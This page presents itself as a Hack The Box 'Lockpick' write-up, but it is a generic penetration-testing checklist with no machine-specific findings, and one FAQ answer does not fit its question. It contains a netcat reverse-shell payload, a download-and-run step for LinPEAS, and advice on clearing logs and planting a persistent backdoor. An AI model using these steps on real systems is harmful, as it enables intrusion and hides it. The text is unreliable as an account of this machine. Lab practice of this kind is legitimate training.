Lockpick Writeup | Hack The Box

Introduction

Hack The Box (HTB) is a popular online platform that provides a variety of virtual machines (VMs) and challenges for aspiring and professional penetration testers. One of these challenges is the “Lockpick” machine, which offers a comprehensive experience in testing one’s skills in web application security, system exploitation, and privilege escalation. In this writeup, we’ll dive into the step-by-step process of compromising the Lockpick Writeup , providing detailed explanations and insights into each step.

Lockpick Writeup

Setting Up Lockpick Writeup Environment

VPN Connection

To start with HTB challenges, you need to connect to the HTB VPN. This connection provides access to the private network where all HTB machines are hosted.

  1. Download the VPN Configuration File: From the HTB website, download the VPN configuration file (usually a .ovpn file).
  2. Connect to VPN: Use a VPN client like OpenVPN to connect using the downloaded file:shCopy codesudo openvpn --config <your_vpn_file.ovpn>

Tools Required

Ensure you have the necessary tools installed on your machine. For this writeup, we will primarily use:

  • Nmap
  • Burp Suite
  • SQLmap
  • netcat
  • LinPEAS (Linux Privilege Escalation Awesome Script)
  • Metasploit

Initial Enumeration

Nmap Scan

Our first step in tackling the Lockpick machine is to perform a comprehensive network scan using Nmap to identify open ports and running services.

shCopy codenmap -sC -sV -oN lockpick_nmap.txt <IP_address>

Analyzing Open Ports

From the Nmap scan results, look for open ports and services that might present vulnerabilities. Commonly targeted ports include HTTP (80, 8080), HTTPS (443), SSH (22), and others.

Web Application Analysis

Inspecting the Web Server

Navigate to the web server in your browser and perform an initial inspection. Look for any login forms, input fields, or other interactive elements.

Identifying Vulnerabilities

Use tools like Burp Suite to intercept and analyze traffic between your browser and the web server. This can help identify common web vulnerabilities such as:

  • SQL Injection
  • Command Injection
  • Cross-Site Scripting (XSS)

Exploiting Vulnerabilities

SQL Injection

If an SQL injection vulnerability is identified, use SQLmap to automate the exploitation process:

shCopy codesqlmap -u "http://<IP_address>/vulnerable_page" --dbs

Command Injection

Command injection can be tested by submitting payloads designed to execute commands on the server. For instance, try appending ;ls to an input field and observe if the response includes a directory listing.

Gaining Initial Access

Obtaining a Shell

After identifying a command injection vulnerability, you can use it to spawn a reverse shell. A common payload for this purpose is:

shCopy codenc -e /bin/sh <your_IP_address> <your_port>

Verifying Access

Once the shell is spawned, verify your access by checking the current user and listing the files in the home directory.

Privilege Escalation

Enumeration of System Information

Use automated scripts like LinPEAS to enumerate system information and identify potential privilege escalation vectors:

shCopy codewget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

Finding Privilege Escalation Vectors

Look for common misconfigurations and weaknesses such as:

  • Writable /etc/passwd or /etc/shadow
  • Sudo rights for the current user
  • Vulnerable SUID binaries

Exploiting Weaknesses for Root Access

Kernel Exploits

If the kernel is outdated, it might be vulnerable to known exploits. Check the kernel version and search for public exploits on platforms like Exploit-DB.

Misconfigured Services

Services running with elevated privileges but improperly configured can also be exploited. Look for services running as root and investigate their configurations.

Post-Exploitation

Clearing Logs

To cover your tracks, clear the command history and logs. Be cautious, as this step can be detected.

Maintaining Access

Set up a persistent backdoor to maintain access in case the system reboots or your initial shell is terminated.

Conclusion

The Lockpick machine on HTB provides an excellent opportunity to practice real-world penetration testing techniques. By following this writeup, you can systematically approach and exploit the machine, gaining valuable insights into web application security and system exploitation. Always remember to respect ethical guidelines and practice these skills in a controlled, legal environment.

FAQs

What is Hack The Box (HTB)?

HTB is an online platform offering a range of virtual machines and challenges for learning and practicing penetration testing and cybersecurity skills.

What is the purpose of Lockpick Writeup penetration testing?

Enumeration involves gathering information about the target system to identify potential vulnerabilities and entry points.

How do I connect to HTB VPN?

Download the VPN configuration file from HTB and use a VPN client like OpenVPN to establish the connection.

What are common tools used in web application security testing?

Common tools include Nmap, Burp Suite, SQLmap, netcat, LinPEAS, and Metasploit.

How can I ensure ethical practice in penetration testing?

Always have explicit permission before testing any system, follow legal guidelines, and use controlled environments like HTB for practice.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top